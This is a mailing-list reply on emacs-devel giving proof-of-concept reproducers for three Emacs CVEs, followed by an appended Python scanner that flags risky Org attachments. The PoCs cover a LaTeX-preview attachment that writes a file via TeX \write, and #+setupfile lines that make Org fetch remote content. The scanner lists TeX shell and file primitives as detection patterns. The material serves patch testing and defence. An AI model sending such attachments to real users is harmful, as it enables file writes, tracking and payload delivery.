From mboxrd@z Thu Jan 1 00:00:00 1970
From: Max Nikulin
Newsgroups: gmane.emacs.devel
Subject: Re: Reproducers for recent Emacs security issues
Date: Sun, 14 Apr 2024 11:41:31 +0700
Message-ID: <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com>
References: <875xwk8w5w.fsf@melete.silentflame.com>
In-Reply-To: <875xwk8w5w.fsf@melete.silentflame.com>
To: Sean Whitton , Ihor Radchenko
Cc: emacs-devel@gnu.org, team@security.debian.org
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Language: en-US, ru-RU
User-Agent: Mozilla Thunderbird
Xref: news.gmane.io gmane.emacs.devel:317719

On 14/04/2024 10:23, Sean Whitton wrote:
>
> I already have a sample Org file that I can use to test whether
> CVE-2024-30202 is fixed. Would you happen to already have reproducers
> for the other two problems to hand?

LaTeX preview issue
===================

- CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents
  as trusted.
- CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by
  default for e-mail attachments.

It requires fixes in Emacs code besides Org mode.

1. Install dvipng. Alternatively you may install dvisvgm and add to your
   init file

   (setq org-preview-latex-default-process 'dvisvgm)

2. Send a mail message with an attachment having

   Content-Type: text/x-org

   or

   Content-Type: text/org

   depending on MUA configuration. By default you may get
   application/vnd.lotus-organizer for .org files due to /etc/mime.types

   Attachment content:

---- 8< ----
#+startup: latexpreview

LaTeX:
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
A \to \textrm{/tmp/\jobname.poc}
\end{equation}

*Warning!* Change the math snippet before every test or remove the
cached image.
---- >8 ----

3. Open the message. LaTeX preview never worked in attachment inline
   preview. Check that a file is created in /tmp/

   ls -l /tmp/orgtex*.poc

The issue is not fixed for the scenario when an arbitrary text file is
opened in Emacs directly (e.g. a file downloaded from some web site).

Attempts to download remote content
===================================

CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of
remote files to be trusted. This affects Org Mode before 9.6.23.

Actually there are 2 issues. They may be used to track that users
receive messages, so mail addresses are valid. In addition they allow
downloading a payload from a remote site for the LaTeX preview or code
execution exploits.

[BUG] Unsolicited download of remote resources. Fri, 2 Feb 2024
23:57:54 +0700. https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io

--- 8< ---
#+setupfile: http://localhost:8000/setup-1234567890.org
--- >8 ---

[BUG] Org may fetch remote content without asking user consent. Wed, 7
Feb 2024 17:54:07 +0700. https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io

Requires the gvfs-backends package to be installed.

--- 8< ---
#+setupfile: /dav:localhost#8000:/msg-123456.org
--- >8 ---

Notice that the following commit is not mentioned in the CVE description.

https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf
2024-02-02 20:59:41 +0100 Ihor Radchenko:
org: Fix security prompt for downloading remote resource

Backporting fixes to Emacs-28 requires more changes since the dialog to
ask the user if a file should be downloaded has been implemented in
Org-9.6 while Emacs-28 is shipped with Org-9.5.

Trying to reproduce, you may face the following issue:

[BUG] Partially broken Org mode when remote setupfile is unavailable.
Tue, 19 Mar 2024 17:46:46 +0700. https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io
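As an added example (my code, not from this e-mail, Emacs or Org mode), a heuristic scanner a mail gateway or a cautious user could run over an Org attachment before opening it in Emacs: it flags remote `#+setupfile`/`#+include` targets (the CVE-2024-30205 reproducers above) and `#+startup: latexpreview` combined with TeX file-I/O primitives (the `\write` reproducer above). The keyword names are Org syntax; the TRAMP path pattern and the primitive watchlist are my assumptions.

```python
"""Pre-open heuristic check for Org attachments (added example, not from the thread)."""
import re
from dataclasses import dataclass, field

# Org keyword line, e.g. "#+setupfile: value"; keyword names are case-insensitive.
KEYWORD_RE = re.compile(r"^\s*#\+(\w+):\s*(.*)$")
# Remote target: a URL scheme, or a TRAMP-style "/method:host:/path" (assumed pattern).
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|/[a-z0-9]+:[^/]*:/)", re.IGNORECASE)
# TeX primitives that do file or shell I/O (assumed watchlist); longer names first.
TEX_PRIMITIVE_RE = re.compile(r"\\(openout|openin|write18|write|input)(?![A-Za-z0-9])")
# Org keywords whose value names a file Org loads while parsing (assumption).
FETCH_KEYWORDS = {"setupfile", "include"}

@dataclass
class ScanResult:
    remote_targets: list = field(default_factory=list)   # CVE-2024-30205 class
    latex_preview: bool = False                          # #+startup: latexpreview
    tex_primitives: list = field(default_factory=list)   # CVE-2024-30203/30204 class

    @property
    def suspicious(self) -> bool:
        # A remote fetch alone is a read receipt; preview plus primitives is the write PoC.
        return bool(self.remote_targets) or (self.latex_preview and bool(self.tex_primitives))

def scan_org_text(text: str) -> ScanResult:
    """Scan one Org document (e.g. a decoded attachment body) line by line."""
    result = ScanResult()
    for line in text.splitlines():
        m = KEYWORD_RE.match(line)
        if m:
            key, value = m.group(1).lower(), m.group(2).strip().strip('"')
            if key in FETCH_KEYWORDS and REMOTE_RE.match(value):
                result.remote_targets.append(value)
            elif key == "startup" and "latexpreview" in value.lower().split():
                result.latex_preview = True
            continue
        for name in TEX_PRIMITIVE_RE.findall(line):
            prim = "\\" + name
            if prim not in result.tex_primitives:
                result.tex_primitives.append(prim)
    return result

# Constructed sample attachment combining the thread's reproducer shapes.
SAMPLE = r"""#+startup: latexpreview
#+setupfile: http://localhost:8000/setup-1234567890.org
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
"""
```

Running `scan_org_text(SAMPLE).suspicious` returns True; a file with only `#+setupfile: common.org` and ordinary math returns False.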